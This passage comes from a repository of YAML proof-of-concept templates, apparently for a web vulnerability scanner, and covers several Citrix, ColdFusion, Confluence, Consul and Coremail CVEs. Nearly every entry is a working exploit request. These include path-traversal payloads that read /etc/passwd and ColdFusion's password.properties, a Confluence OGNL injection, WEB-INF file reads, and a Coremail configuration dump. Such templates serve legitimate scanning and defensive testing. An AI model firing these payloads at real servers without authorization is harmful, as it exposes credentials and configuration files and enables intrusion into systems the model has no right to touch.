20 | - https://blog.unauthorizedaccess.nl/2020/07/07/adventures-in-citrix-security-research.html
21 |
--------------------------------------------------------------------------------
/src/plugins/pocs/citrix-xenmobile-cve-2020-8209.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-citrix-xenmobile-cve-2020-8209
2 | rules:
3 | - method: GET
4 | path: /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd
5 | follow_redirects: false
6 | expression: |
7 | response.status == 200 && response.content_type.contains("octet-stream") && "^root:[x*]:0:0:".bmatches(response.body)
8 | detail:
9 | author: B1anda0(https://github.com/B1anda0)
10 | links:
11 | - https://nvd.nist.gov/vuln/detail/CVE-2020-8209
12 |
--------------------------------------------------------------------------------
/src/plugins/pocs/coldfusion-cve-2010-2861-lfi.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-coldfusion-cve-2010-2861-lfi
2 | rules:
3 | - method: GET
4 | path: >-
5 | /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en
6 | follow_redirects: true
7 | expression: |
8 | response.status == 200 && response.body.bcontains(b"rdspassword=") && response.body.bcontains(b"encrypted=")
9 | detail:
10 | version: 8.0, 8.0.1, 9.0, 9.0.1 and earlier versions
11 | author: sharecast
12 | links:
13 | - https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861
--------------------------------------------------------------------------------
/src/plugins/pocs/confluence-cve-2015-8399.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-confluence-cve-2015-8399
2 | rules:
3 | - method: GET
4 | path: /spaces/viewdefaultdecorator.action?decoratorName
5 | follow_redirects: false
6 | expression: response.status == 200 && response.body.bcontains(b"confluence-init.properties") && response.body.bcontains(b"View Default Decorator")
7 | detail:
8 | author: whynot(https://github.com/notwhy)
9 | links:
10 | - https://www.anquanke.com/vul/id/1150798
--------------------------------------------------------------------------------
/src/plugins/pocs/confluence-cve-2019-3396-lfi.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-confluence-cve-2019-3396-lfi
2 | rules:
3 | - method: POST
4 | path: /rest/tinymce/1/macro/preview
5 | headers:
6 | Content-Type: "application/json"
7 | Host: localhost
8 | Referer: http://localhost
9 | body: >-
10 | {"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"../web.xml"}}}
11 | follow_redirects: true
12 | expression: |
13 | response.status == 200 && response.body.bcontains(b"contextConfigLocation")
14 | detail:
15 | author: sharecast
16 | links:
17 | - https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2019-3396
--------------------------------------------------------------------------------
/src/plugins/pocs/confluence-cve-2021-26084.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-confluence-cve-2021-26084
2 | set:
3 | r1: randomInt(100000, 999999)
4 | r2: randomInt(100000, 999999)
5 | rules:
6 | - method: POST
7 | path: /pages/createpage-entervariables.action?SpaceKey=x
8 | body: |
9 | queryString=\u0027%2b%7b{{r1}}%2B{{r2}}%7d%2b\u0027
10 | expression: |
11 | response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
12 | detail:
13 | author: Loneyer(https://github.com/Loneyers)
14 | links:
15 | - https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html
16 |
--------------------------------------------------------------------------------
/src/plugins/pocs/confluence-cve-2021-26085-arbitrary-file-read.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-confluence-cve-2021-26085-arbitrary-file-read
2 | set:
3 | rand: randomLowercase(6)
4 | rules:
5 | - method: GET
6 | path: /s/{{rand}}/_/;/WEB-INF/web.xml
7 | follow_redirects: false
8 | expression: response.status == 200 && response.body.bcontains(b"Confluence") && response.body.bcontains(b"com.atlassian.confluence.setup.ConfluenceAppConfig")
9 | detail:
10 | author: wulalalaaa(https://github.com/wulalalaaa)
11 | links:
12 | - https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html
13 |
--------------------------------------------------------------------------------
/src/plugins/pocs/consul-rexec-rce.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-consul-rexec-rce
2 | rules:
3 | - method: GET
4 | path: /v1/agent/self
5 | expression: |
6 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"DisableRemoteExec\": false")
7 | detail:
8 | author: imlonghao(https://imlonghao.com/)
9 | links:
10 | - https://www.exploit-db.com/exploits/46073
11 |
--------------------------------------------------------------------------------
/src/plugins/pocs/consul-service-rce.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-consul-service-rce
2 | rules:
3 | - method: GET
4 | path: /v1/agent/self
5 | expression: |
6 | response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"EnableScriptChecks\": true") || response.body.bcontains(b"\"EnableRemoteScriptChecks\": true")
7 | detail:
8 | author: imlonghao(https://imlonghao.com/)
9 | links:
10 | - https://www.exploit-db.com/exploits/46074
11 |
--------------------------------------------------------------------------------
/src/plugins/pocs/coremail-cnvd-2019-16798.yml:
--------------------------------------------------------------------------------
1 | name: poc-yaml-coremail-cnvd-2019-16798
2 | rules:
3 | - method: GET
4 | path: >-
5 | /mailsms/s?func=ADMIN:appState&dumpConfig=/
6 | follow_redirects: false
7 | expression: >
8 | response.status == 200 && response.body.bcontains(bytes("